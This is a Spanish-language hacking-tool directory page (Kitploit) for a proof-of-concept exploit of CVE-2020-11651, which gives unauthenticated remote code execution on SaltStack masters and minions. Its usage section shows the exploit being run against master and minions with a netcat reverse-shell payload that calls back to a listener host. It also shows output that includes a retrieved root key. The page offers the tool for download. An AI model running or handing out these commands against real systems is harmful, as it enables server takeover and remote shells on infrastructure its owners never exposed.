Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2020-11651 — Exploit de prueba de concepto para CVE-2020-11651 que logra ejecución remota de código sin autenticación previa en el servidor maestro y los minions de SaltStack mediante el ejecutor salt.cmd. | Kitploit
Herramientas/GitHubGitHub/dozernz/cve-2020-11651
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubdozernz/cve-2020-11651

cve-2020-11651

Exploit de prueba de concepto para CVE-2020-11651 que logra ejecución remota de código sin autenticación previa en el servidor maestro y los minions de SaltStack mediante el ejecutor salt.cmd.

Ver Repositorio
106361hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-11651

Esta es una POC para CVE-2020-11651, que obtiene RCE sin autenticación en un master de SaltStack y/o todos los minions asociados. Algunos detalles ligeros sobre el problema están aquí. La POC para 2020-11652 no está incluida.

Esto obtiene ejecución de comandos en el master creando un runner de salt.cmd con la función cmd.exec_code. No hay interactividad implementada, necesitarás capturar una reverse shell.

Uso

Probado en Debian10 contra una instancia de Debian10. Necesita ncat para recibir y enviar una shell, y la biblioteca pip3 install salt para el transporte.

root@kitploit:~
user@debian10:~$ ./cve-2020-11651.py 192.168.200.135 master 'nc 192.168.200.137 4444 -e "/bin/bash"'
/usr/local/lib/python3.7/dist-packages/salt/ext/tornado/httputil.py:107: DeprecationWarning: Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated, and in 3.8 it will stop working
  class HTTPHeaders(collections.MutableMapping):
Attempting to ping master at 192.168.200.135
Retrieved root key: ajazew2a7V7gaxT2e5Vyi1pALtWYLOCp3L+A3xYc1iilwZEPhbnERhhGvzrDh8NVa2x0xNvYIJE=
Got response for attempting master shell: {'tag': 'salt/run/20200504080050593352', 'jid': '20200504080050593352'}. Looks promising!

user@debian10:~$ ./cve-2020-11651.py 192.168.200.135 minions 'nc 192.168.200.137 4444 -e "/bin/bash"'
/usr/local/lib/python3.7/dist-packages/salt/ext/tornado/httputil.py:107: DeprecationWarning: Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated, and in 3.8 it will stop working
  class HTTPHeaders(collections.MutableMapping):
Attempting to ping master at 192.168.200.135
Retrieved root key: ajazew2a7V7gaxT2e5Vyi1pALtWYLOCp3L+A3xYc1iilwZEPhbnERhhGvzrDh8NVa2x0xNvYIJE=
Sending command to all minions on master

user@debian10:~$ ./cve-2020-11651.py 192.168.200.135 fetchkeyonly
/usr/local/lib/python3.7/dist-packages/salt/ext/tornado/httputil.py:107: DeprecationWarning: Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated, and in 3.8 it will stop working
  class HTTPHeaders(collections.MutableMapping):
Attempting to ping master at 192.168.200.135
Retrieved root key: ajazew2a7V7gaxT2e5Vyi1pALtWYLOCp3L+A3xYc1iilwZEPhbnERhhGvzrDh8NVa2x0xNvYIJE=
user@debian10:~$ 

saltstack

Descargar herramienta